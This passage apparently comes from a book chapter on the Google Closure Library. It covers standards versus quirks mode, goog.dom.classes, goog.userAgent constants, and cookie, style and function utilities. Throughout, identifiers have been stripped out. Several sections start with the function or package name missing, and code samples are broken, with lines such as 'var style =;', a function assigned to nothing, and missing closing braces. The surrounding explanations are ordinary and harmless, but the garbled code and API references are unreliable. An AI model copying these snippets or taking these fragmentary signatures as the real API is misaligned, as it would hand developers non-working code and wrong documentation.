// <i>Only <b>you</b> can prevent forest fires.</i>
var italicEl = goog.dom.createDom('i', undefined, smokeyTheBearSays);

As shown here, it is possible to build up the DOM using a combination of Elements and DocumentFragments.


Web pages are basically rendered in one of two modes: standards mode or quirks mode. Standards mode is for web pages that expect the browser to render the page according the standards set by the World Wide Web Consortium (W3C). A web page elects to be rendered in standards mode by including a special identifier at the top of the page (before the opening <html> tag) called a doctype. This doctype used to be lengthy and had a number of variations which inevitably led to inadvertent misspellings, causing no end of headaches and confusion for web developers. The following are the two most common doctypes for HTML pages that should be rendered in standards mode:

  "-//W3C//DTD HTML 4.01//EN"

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"

Fortunately, the emerging HTML5 standard simplifies things and introduces the following backward-compatible doctype to indicate that standards mode should be used:


It turned out that neither browsers nor developers were interested in the stuff that came after the “HTML” part of the doctype because adopting the HTML5 doctype did not require changing the parsing logic for doctypes in existing web browsers. (If that were not the case, it is unlikely that this abbreviated doctype would have been chosen for HTML5.) Note that the HTML5 doctype is case-insensitive, so <!doctype html> is equivalent to <!DOCTYPE HTML>.

Web pages that do not contain a doctype to indicate that standards mode should be used will be rendered in what is now referred to as quirks mode. By the time web standards were agreed upon and implemented by browser vendors, there were already millions of pages on the Web that were created without any regard to the latest publications from the W3C. In order to preserve the appearance of such pages, new web browsers would maintain logic for both rendering models, each preserving its own “quirks” so that pages that had been designed for any buggy browser behavior would still display as intended. Because each browser has its own set of quirks that it has carried through its history, designing pages that display consistently in quirks mode across browsers is extremely difficult. When creating a web page, the use of standards mode is strongly recommended to simplify cross-browser development.

Just like the web browsers that are weighed down by the baggage of quirks mode logic that they cannot discard for fear of losing backward compatibility, the Closure Library is also bloated by additional logic to abstract away the differences between standards and quirks modes. One might wonder why a JavaScript library designed for internal use at Google would need to bother with support for quirks mode—would it not be possible to mandate that all web pages within the company adhere to web standards? It turns out the answer is no: many applications had been designed for quirks mode and their codebases were too large to refactor to support standards mode without considerable effort.

Further, Google offers a number of embeddable JavaScript libraries (the Google Maps API being one of the most prominent) for use on third-party sites. These libraries have no control over the rendering mode of the host page, and requiring users to change their doctypes could limit adoption. Even if Google could mandate the use of standards mode throughout the company, engineers producing third-party JavaScript libraries would still need to include logic that could tolerate quirks mode.

When developing a website with Closure where the rendering mode of the host page is known at compile time, it makes sense to exclude all of the logic associated with the unused rendering mode from the compiled JavaScript. This can be done by using the Compiler’s --define flag to set either goog.dom.ASSUME_QUIRKS_MODE or goog.dom.ASSUME_STANDARDS_MODE to true (whichever mode will be used in the host page). Setting one of these variables to true makes it possible for the Compiler to identify many chunks of code within the Closure Library as unreachable, in which case they can safely be removed from the compiled output. This reduces compiled code size and improves runtime performance.

Both of these constants are false by default (when no --define flag is used), in which case the rendering mode of the host page will be determined at runtime by the Closure Library. Because the Library cannot assume that it will be working with only one Document during the lifetime of the application, many functions in goog.dom have to check the mode of the Document each time they are called rather than performing the check once and caching the result. If an application works with multiple Documents that may use different rendering modes, neither goog.dom.ASSUME_QUIRKS_MODE nor goog.dom.ASSUME_STANDARDS_MODE can be set at compile time because logic for both modes may be exercised during the lifetime of the application.


goog.dom.classes is a small collection of functions to help with manipulating an element’s CSS classes. Because an element’s className property returns the CSS classes as a space-delimited string, working with individual classes often requires splitting the string into individual names, manipulating them, and then putting them back together. The functions in goog.dom.classes abstract away the string manipulation and are implemented so that they touch the className property as little as possible. Accessing DOM properties is often more expensive than accessing properties of pure JavaScript objects, so DOM access is minimized in the Closure Library.

More importantly, it turns out that not all elements have a className property that is a string. IFRAME elements in Internet Explorer do not have a className property, and the className property of an SVG element in Firefox returns a function rather than a string. Using goog.dom.classes abstracts away these subtle cross-browser differences.

Much of the functionality in goog.dom.classes will also be available via the classList property proposed for HTML5. When available, the functions in goog.dom.classes will likely be reimplemented to take advantage of classList, but the contracts of the functions should remain unchanged.


goog.dom.classes.get(element) returns an array of class names on the specified element. If the element does not have any class names, a new empty array will be returned. It is this function that is largely responsible for hiding the cross-browser differences discussed in the overview for goog.dom.classes. Other utilities for working with CSS classes should be based on this function to benefit from the abstraction it provides.

// element is <span class="snap crackle pop"></span>

// evaluates to ['snap', 'crackle', 'pop']

Note that in HTML5, classList does not have an equivalent to goog.dom.classes.get, but it is not necessary because classList itself is an Array-like object. It is not mutable, like a true array, but it has a length property and its values are numerically indexed.

goog.dom.classes.has(element, className)

goog.dom.classes.has returns true if element has the specified className; otherwise, it returns false.

// element is <span class="snap crackle pop"></span>

// evaluates to true
goog.dom.classes.has(element, 'snap');

// evaluates to false
goog.dom.classes.has(element, 'pow');

// evaluates to false because 'crackle pop' fails to identify a single class name
goog.dom.classes.has(element, 'crackle pop');

In HTML5, the proposed name for the equivalent method on classList is contains. According to the HTML5 draft, if className contains a space character (or is the empty string), the browser should throw an error, but in Closure, goog.dom.classes.has simply returns false.

goog.dom.classes.add(element, var_args) and goog.dom.classes.remove(element, var_args)

Both goog.dom.classes.add and goog.dom.classes.remove take an element and a list of class names, and add or remove the names, as appropriate. Names that already exist are not added again, and names that do not exist do not throw an error if they are passed to goog.dom.classes.remove:

// element is <span class="snap crackle pop"></span>

// After evaluation, element's className will still be 'snap crackle pop' 
goog.dom.classes.remove(element, 'pow');

// After evalulation, element's className will be 'crackle'
goog.dom.classes.remove(element, 'snap', 'pop', 'pow');

// After evaluation, element's className will be 'crackle pop snap'
goog.dom.classes.add(element, 'pop', 'snap');

Although goog.dom.classes.add and goog.dom.classes.remove accept an arbitrary number of class names, the proposed specification for classList supports only a single class name argument per call. Further, if classList.add or classList.remove receives a class name argument that contains spaces (or is the empty string), it will throw an error. In Closure, such malformed arguments will be silently ignored. Finally, the Closure version returns true if all class names are added or removed (false otherwise), but the equivalent classList methods do not have any return value.

goog.dom.classes.toggle(element, className)

goog.dom.classes.toggle removes the className if element has it, and adds it if it does not have it. This is effectively a shorthand for:

return (goog.dom.classes.has(element, className)) ?
    !goog.dom.classes.remove(element, className) :
    goog.dom.classes.add(element, className);

However, the goog.dom.classes.toggle implementation is more efficient in the number of accesses to element’s className property.

The classList proposed in HTML5 will also have support for toggle. Its behavior will be exactly the same as goog.dom.classes.toggle except it will throw an error if className contains a space character (or is the empty string).

goog.dom.classes.swap(element, fromClass, toClass)

goog.dom.classes.swap takes an element and replaces its fromClass with toClass if element has fromClass as a CSS class. If element does not have fromClass as a CSS class, then its className will not be modified. As shown in the example, the caller should be certain that element does not already have toClass; otherwise, it will appear twice in element’s className.

// element is <span class="snap crackle pop"></span>

// After evaluation, element's className will still be 'snap crackle pop'
goog.dom.classes.swap(element, 'pow', 'snap');

// After evaluation, element's className will be 'crackle pop pow'
goog.dom.classes.swap(element, 'snap', 'pow');

// After evaluation, element's className will be 'crackle pop pop'
goog.dom.classes.swap(element, 'pow', 'pop');

// After evaluation, element's className will be 'crackle snap'
// Note that both instances of 'pop' are replaced with a single instance of 'snap'.
goog.dom.classes.swap(element, 'pop', 'snap');

As demonstrated in the example, the swapping is not bidirectional. That is, goog.dom.classes.swap does not look for either of the specified classes and if it finds only one, replaces it with the other. A replacement is only done when fromClass is found. The following function can be used to swap either class for the other:

 * element must have exactly one of aClass or bClass, or the behavior is
 * unspecified.
 * @param {!Element} element
 * @param {string} aClass
 * @param {string} bClass
var swapOneForOther = function(element, aClass, bClass) {
  goog.dom.classes.toggle(element, aClass);
  goog.dom.classes.toggle(element, bClass);

There is no analogue for goog.dom.classes.swap in the HTML5 specification.

goog.dom.classes.enable(element, className, enabled)

goog.dom.classes.enable enables or disables the className on element, as specified by the enabled boolean. This is effectively a shorthand for:

if (enabled) {
  goog.dom.classes.add(element, className);
} else {
  goog.dom.classes.remove(element, className);

Although it uses goog.dom.classes.add and goog.dom.classes.remove, goog.dom.classes.enable does have a return value of its own.

There is no analogue for goog.dom.classes.enable in the HTML5 specification.


goog.userAgent is primarily a collection of boolean constants that provide information about the environment in which the JavaScript is running based on the user agent. These constants are referenced throughout the Closure Library to branch on browser-specific or operating-system-specific behavior. All of the boolean constants will be false unless information in the user agent for the environment indicates that they should be set to true. Some environments may lack a user agent (such as JavaScript running on the server), in which case all of these constants will retain their default values (either false or the empty string).

Like goog.dom.ASSUME_STANDARDS_MODE and goog.dom.ASSUME_QUIRKS_MODE, there are constants in goog.userAgent that can be set at compile time so that the Compiler can remove code that is not used on the target browser or platform. Web applications that wish to take advantage of the Compiler’s dead code elimination will need to do a separate compilation for each browser that it plans to support, and must be sure to serve the JavaScript file that is compiled for the browser that requests it. Although this can add extra complexity to the build process and the server, it is fairly simple to compile a specialized version of JavaScript for iPhone and Android-based devices by passing --define goog.userAgent.ASSUME_MOBILE_WEBKIT=true to the Compiler. Most high-end websites already serve different content to mobile devices than they do to desktop computers.

Much more code in the Closure Library is branched based on the rendering engine (Internet Explorer versus WebKit) than it is on the platform (Windows versus Mac). Because of this, much more code can be eliminated by setting one of the rendering engine constants at compile time than by setting one of the platform constants.

Rendering Engine Constants

Table 4-1 lists the values of goog.userAgent that can be tested to determine the user agent of the runtime environment. For each value, it also lists the value of goog.userAgent that can be set to true at compile time to predetermine the values of the other goog.userAgent rendering engine constants.

Table 4-1. Rendering engine constants in goog.userAgent.

Value of goog.userAgentCompile-time constantDescription
IEASSUME_IEtrue if the JavaScript is running in a browser that uses Microsoft’s Trident rendering engine. Because Trident is embeddable in any Windows application, it is also embedded in many desktop applications on Windows, such as Internet Explorer and Google Desktop.
GECKOASSUME_GECKOtrue if the JavaScript is running in a browser that uses Mozilla’s Gecko rendering engine. In addition to Firefox, Gecko is also used to power Fennec and Camino.
WEBKITASSUME_WEBKITtrue if the JavaScript is running in a browser that uses the WebKit rendering engine. This includes Safari and Google Chrome. This will also be set to true at compile time if --define goog.userAgent.ASSUME_MOBILE_WEBKIT is set.
OPERAASSUME_OPERAtrue if the JavaScript is running on any Opera-based browser. This includes the browser that can be downloaded for the Nintendo Wii.
MOBILEASSUME_MOBILE_WEBKITtrue if the JavaScript is running in WebKit on a mobile device. Closure uses the existence of "Mobile" in the user agent string to make this determination. It is likely that this excludes a number of JavaScript-enabled mobile web browsers (such as the Palm Pre), but this heuristic will work for iPhones and Android-based devices. This will be set to true at compile time if --define goog.userAgent.ASSUME_MOBILE_WEBKIT is set, though the flag should be set only if the target rendering engine is indeed WebKit and not for other mobile browsers such as Opera Mini, as this has the side effect of also setting goog.userAgent.WEBKIT to true.

In general, it is preferable to use feature detection rather than browser detection to determine which browser-specific behavior should be used. In web development, feature detection is the practice of using JavaScript to determine a browser’s capability at runtime and responding with the appropriate behavior. The alternative is known as browser detection, whereby different behaviors are hardcoded for different browsers. Generally speaking, feature detection is preferable because the features that a browser supports may change over time, so feature detection is designed to be robust to such changes, whereas browser detection is not.

For example, instead of using goog.userAgent to determine how to set the opacity of an element, (which is discussed later in this chapter) tests what properties of the style object are available to determine how to set an element’s opacity. This is a good example of using feature detection to handle browser differences:

 * Sets the opacity of a node (x-browser).
 * @param {Element} el Elements whose opacity has to be set.
 * @param {number|string} alpha Opacity between 0 and 1 or an empty string
 *     {@code ''} to clear the opacity.
 */ = function(el, alpha) {
  var style =;
  if ('opacity' in style) {
    style.opacity = alpha;
  } else if ('MozOpacity' in style) {
    style.MozOpacity = alpha;
  } else if ('filter' in style) {
    // TODO(user): Overwriting the filter might have undesired side effects.
    if (alpha === '') {
      style.filter = '';
    } else {
      style.filter = 'alpha(opacity=' + alpha * 100 + ')';

Unfortunately, some features do not lend themselves to feature detection, which is where goog.userAgent comes in handy. For example, the implementation of (which is also discussed later in this chapter) uses goog.userAgent to determine which CSS to use to style an element that contains preformatted text:

 * @param {Element} el Element to enable pre-wrap for.
 */ = function(el) {
  var style =;
  if (goog.userAgent.IE && !goog.userAgent.isVersion('8')) {
    style.whiteSpace = 'pre';
    style.wordWrap = 'break-word';
  } else if (goog.userAgent.GECKO) {
    style.whiteSpace = '-moz-pre-wrap';
  } else if (goog.userAgent.OPERA) {
    style.whiteSpace = '-o-pre-wrap';
  } else {
    style.whiteSpace = 'pre-wrap';

To provide even more browser-specific behavior, there is also a goog.userAgent.VERSION variable that reflects the version of the user agent, which generally refers to the rendering engine, not the browser. Recall that versions are strings rather than numbers because, unlike numbers, versions may contain multiple dots and letters. For Internet Explorer and Opera, browser versions and rendering engine versions are the same. For modern versions of WebKit-based browsers, this will be some number greater than 500 even though the versions of the popular browsers that use WebKit (Safari and Google Chrome) are in the single digits. Mozilla-based browsers are slowly approaching version 2.0 of Gecko. Check Wikipedia for a comprehensive mapping of web browser version numbers to user agent version numbers.

Platform Constants

Like the rendering engine constants, goog.userAgent also has variables that indicate the platform on which the JavaScript code is running. Table 4-2 lists the values that can be tested.

Table 4-2. Platform constants in goog.userAgent.

Value of goog.userAgentCompile-time constantDescription
WINDOWSASSUME_WINDOWStrue if the JavaScript is running on a Windows operating system.
MACASSUME_MACtrue if the JavaScript is running on a Macintosh operating system.
LINUXASSUME_LINUXtrue if the JavaScript is running on a Linux operating system.
X11ASSUME_X11true if the JavaScript is running on an X11 windowing system.

Such constants may be used to present the download link for the platform that matches the one the user is using to access your website:

var label;
if (goog.userAgent.WINDOWS) {
  label = 'Windows';
} else if (goog.userAgent.MAC) {
  label = 'Mac';
} else if (goog.userAgent.LINUX) {
  label = 'Linux';

if (label) {
  goog.dom.getElement('download').innerHTML = '<a href="/download?platform=' +
      label + '">Download the latest version for ' + label + '</a>';

There is also a goog.userAgent.PLATFORM string that identifies the platform (operating system) the JavaScript is running on. This is generally taken directly from window.navigator.platform, though some environments do not have a navigator object, such as Rhino.


goog.userAgent.isVersion returns true only if version is “less than or equal to” goog.userAgent.VERSION as defined by the goog.string.compareVersions comparator. Recall that goog.userAgent.VERSION reflects the version of the rendering engine, not the version of the browser. Because rendering engines generally maintain features supported by an earlier version, goog.userAgent.isVersion returns true when the specified version is less than or equal to goog.userAgent.VERSION. This has an important impact on how logic that is conditional upon browser versions should be implemented. Consider the following function that tests whether transparent PNGs are supported (full support was introduced in Internet Explorer 7):

var hasSupportForTransparentPng = function() {
  if (goog.userAgent.IE) {
    // This will not have the desired behavior!
    return !goog.userAgent.isVersion(6);
  } else {
    return true;

Although this may read as “return false if this is IE6,” which is correct, this also means “return false if this is IE7,” which is not correct. The simplest way to fix this is to focus on the version at which point transparent PNGs are supported, rather than the last version that did not support them:

if (goog.userAgent.IE) {
  return goog.userAgent.isVersion(7);

Assuming that transparent PNGs are supported onward from Internet Explorer 7, this code will not have to change to accommodate future releases of Internet Explorer.

To check for a specific version of Internet Explorer, two calls to goog.userAgent.isVersion must be used:

var isInternetExplorer6 = goog.userAgent.IE &&
    goog.userAgent.isVersion(6) && !goog.userAgent.isVersion(7);


Like goog.userAgent, goog.userAgent.product is a collection of boolean constants that provide information about the environment in which the JavaScript is running. But unlike goog.userAgent, the constants in goog.userAgent.product are not frequently used in the Closure Library; in fact, they are not used at all! This is because most errant browser behavior is due to the rendering engine, specified by goog.userAgent, rather than the browser that contains the engine, specified by goog.userAgent.product. Because the rendering engine is the source of the quirks, it is what needs to be tested most often under the hood in order to provide a browser-agnostic JavaScript API.

That is not to say that goog.userAgent.product is useless—far from it. It makes it possible to differentiate iPhone devices from Android devices, which is important because each may have some custom APIs that the other does not. Although the Closure Library aims to provide a uniform API that works on all modern browsers, your own web applications may be tailored to work on a select handful of platforms for which testing for goog.userAgent.product is important. Table 4-3 lists the values in goog.userAgent.product that can be tested.

Table 4-3. Product constants in goog.userAgent.product.

Value of goog.userAgent.productCompile-time constantDescription
ANDROIDgoog.userAgent.product.ASSUME_ANDROIDtrue if the JavaScript is running on the built-in browser on an Android phone. If ASSUME_ANDROID is used, then --define goog.userAgent.ASSUME_MOBILE_WEBKIT should be used as well.
IPHONEgoog.userAgent.product.ASSUME_IPHONEtrue if the JavaScript is running on an iPhone or an iPod touch. If ASSUME_IPHONE is used, then --define goog.userAgent.ASSUME_MOBILE_WEBKIT should be used as well.
IPADgoog.userAgent.product.ASSUME_IPADtrue if the JavaScript is running on an iPad. If ASSUME_IPAD is used, then --define goog.userAgent.ASSUME_MOBILE_WEBKIT should be used as well.
FIREFOXgoog.userAgent.product.ASSUME_FIREFOXtrue if the JavaScript is running on the Firefox web browser. Even though goog.userAgent.GECKO may be true, this could be Firefox or another Gecko-based browser such as Fennec or Camino. If ASSUME_FIREFOX is used, then --define goog.userAgent.ASSUME_GECKO should be used as well.
CAMINOgoog.userAgent.product.ASSUME_CAMINOtrue if the JavaScript is running on the Camino web browser. Camino is a Gecko-based browser, like Firefox, but its UI is built using native Mac widgets in an attempt to make it more lightweight than Firefox. But because it uses a different UI toolkit than Firefox, far fewer browser extensions are written for Camino than Firefox. Because browsers on the Mac have improved so much in recent years, the advantages of using Camino over Firefox or Safari are minimal, and Camino’s marketshare has dwindled. It is unlikely that Camino-specific logic will be necessary (though it has been known to happen). If ASSUME_CAMINO is used, then --define goog.userAgent.ASSUME_GECKO should be used as well.
SAFARIgoog.userAgent.product.ASSUME_SAFARItrue if the JavaScript is running on the Safari web browser. If ASSUME_SAFARI is used, then --define goog.userAgent.ASSUME_WEBKIT should be used as well.
CHROMEgoog.userAgent.product.ASSUME_CHROMEtrue if the JavaScript is running on the Chrome web browser. If ASSUME_CHROME is used, then --define goog.userAgent.ASSUME_WEBKIT should be used as well.
IEgoog.userAgent.ASSUME_IEtrue if the JavaScript is running on the Internet Explorer web browser.
OPERAgoog.userAgent.ASSUME_OPERAtrue if the JavaScript is running on the Opera web browser. is a collection of functions for setting, getting, and deleting cookies. In JavaScript, working with cookies in a browser is done through document.cookie, though it is often confusing to use document.cookie directly because of its curious API. Although semantically document.cookie appears to be an ordinary property, it is actually a getter and setter, which means that reading or writing the property results in a function call behind the scenes that may have a side effect. Unlike other getters and setters like document.title and document.body, for which a read followed by a write returns something similar (if not identical to) the value that was written, the value returned by document.cookie rarely resembles the last value that was written to it. This is because assigning a value to document.cookie has the side effect of setting a single cookie, but reading the value of document.cookie returns a semicolon-delimited list of all cookies that have been set. Therefore, reading an individual cookie value requires parsing the value of document.cookie, so it is simpler to let the package handle this parsing for you. For the most part, treats the set of cookies like properties defined on an object literal, so its API has much in common with that of goog.object. However, it also has several functions that are specific to cookies. returns true if cookies are enabled; otherwise, it returns false. Generally, this can be checked directly via window.navigator.cookieEnabled, but includes some additional logic to work around buggy browser behavior., value, opt_maxAge, opt_path, opt_domain) sets the value of a cookie, along with its optional attributes. By default, opt_path and opt_domain will use the browser defaults, which are the root path (/) and the document host, respectively. The opt_maxAge argument specifies the maximum age of the cookie (in seconds) from the time at which it is set, though if unspecified, it defaults to -1. When opt_maxAge is less than zero, the expiration attribute of the cookie will not be set, effectively making it a session cookie., opt_default) returns the value for the first cookie with the specified name. If no such cookie is found, then opt_default is returned if specified; otherwise, the function returns undefined., opt_path, opt_domain) removes and expires the specified cookie. Although this could be accomplished by calling with a value of '' and an opt_maxAge of 0, using is preferred. is a collection of utilities for getting and setting style information on DOM elements. Because there are so many minor differences between how browsers handle positioning and style issues, makes heavy use of goog.userAgent behind the scenes. returns a goog.math.Coordinate that represents the position of element relative to the top left of the HTML document to which it belongs. For what would seem to be a straightforward calculation, it turns out to be rather complex because of all the browser bugs related to positioning issues. Most blogs recommend the following naïve implementation:

var getPageOffset = function(element) {
  var point = { x: 0, y: 0 };
  var parent = element;
  do {
    point.x += parent.offsetLeft;
    point.y += parent.offsetTop;
  } while (parent = parent.offsetParent);
  return point;

Although this would work most of the time, there is a number of cases for which it would not, and tracking down the source of such bugs is difficult. Skimming the nearly 100-line implementation of reveals that it is far from trivial. returns a goog.math.Size that represents the height and width of element, even if its current display property is "none". For hidden elements, this is achieved by temporarily showing the element, measuring it, and then hiding it again. returns a goog.math.Rect with the position information from and the dimension information from, opacity) sets the opacity of element to opacity. opacity should be a value from 0 to 1, inclusive, or the empty string to clear the existing opacity value. Browsers fail to expose a consistent API for setting an element’s opacity, so use to abstract away the differences.

There is a complementary function to get an element’s opacity as a value between 0 and 1 (or the empty string if it is not set). sets the white-space CSS style on element to pre-wrap in a cross browser way. (This pre-wrap style has the effect of preserving the whitespace of the element as preformatted text, as the <pre> tag would.) Each browser has its own name for the pre-wrap style, so uses the appropriate value, depending on the user agent. updates the style on element so that it behaves as if the style display: inline-block were applied to it. When displayed as inline-block, an element can be sized like a block element, but appear on the same line as its siblings like an inline element. Unfortunately, not all browsers support display: inline-block directly, in which case it must be approximated using other CSS styles.

The file goog/css/common.css captures this idea in CSS by defining a class named goog-inline-block in a cross-browser way. Many of Closure’s UI components depend on the existence of goog-inline-block, so it is likely that the definition of goog-inline-block will need to be copied from common.css to your application. (Unfortunately, Closure does not have tools for managing CSS dependencies as it does for JavaScript dependencies.) Assuming goog-inline-block is available, another way to implement this function would be:

goog.dom.classes.add(element, 'goog-inline-block');

Because there is no complementary function, the previous implementation has the advantage that the inline-block style can be removed with one line of code:

goog.dom.classes.remove(element, 'goog-inline-block');, unselectable, opt_noRecurse) sets whether the text selection is enabled in element and all of its descendants (unless opt_noRecurse is true). Some rendering engines allow text selection to be controlled via CSS; others support a separate unselectable attribute (whose default value is off). Because of the cascading nature of CSS, rendering engines that support this setting via CSS need only to set the appropriate style on element and the effect will cascade to all of its descendants (assuming none if its descendants override the value of the style being set). Because DOM attributes are applied to only an element and not its descendants, rendering engines that support the unselectable attribute must explicitly set it to on for element and all of its descendants to disable text selection on an entire subtree.

There is a complementary function that determines whether the specified element is unselectable., opt_node) takes a string of style information and installs it into the window that contains opt_node (which defaults to window if opt_node is not specified). It returns either an Element or StyleSheet that can be used with or to update or remove the styles, respectively:

var robotsTheme = 'body { background-color: gray; color: black }';
var sunsetTheme = 'body { background-color: orange; color: red }';

// Adds the "robot" theme to the page.
var stylesEl =;

// Replaces the "robot" theme with the "sunset" theme., sunsetTheme);

// Removes the "sunset" theme.;

This will change the styles in the page without requiring the page to be reloaded. Gmail uses this to let its user switch between themes., container, opt_center) minimally changes the scroll position of container so that the content and borders of element become visible. If opt_center is true, then the element will be centered within the container.

This is similar to the built-in scrollIntoView method which is available to all elements, except that is also guaranteed to scroll horizontally, if necessary, and offers the opt_center option, which the native implementation does not.


goog.functions is a collection of functions and function-building utilities. In JavaScript, functions are frequently used as arguments to other functions. Chapter 3 introduced goog.nullFunction and explained how it is often supplied as a callback argument when the callback is meant to be ignored. Other times the callback is not ignored, but its implementation is trivial. Often, such a callback can be built up using the utilities in goog.functions without using the function keyword, saving bytes.


goog.functions.TRUE is a function that always returns true. Like goog.nullFunction in Chapter 3, goog.functions.TRUE should never be used as a function argument if it is possible that the argument is going to be modified in any way, as any changes to it may lead to unexpected behavior for other clients of goog.functions.TRUE.

There is also a goog.functions.FALSE which is a function that always returns false.


goog.functions.constant creates a new function that always returns value. It is possible to use goog.functions.constant to create a new function whose behavior is equivalent to goog.functions.TRUE:

var functionThatAlwaysReturnsTrue = goog.functions.constant(true);

Because functionThatAlwaysReturnsTrue is a new function, its value is not shared and therefore it can be used as an argument that may be modified.


This creates a new function that always throws an error with the given message. It may be tempting to use goog.functions.error instead of goog.abstractMethod when defining an abstract method, but this is discouraged because the Closure Compiler contains special logic for processing goog.abstractMethod. Using goog.abstractMethod maintains the semantics of defining an abstract method, whereas goog.functions.error does not.

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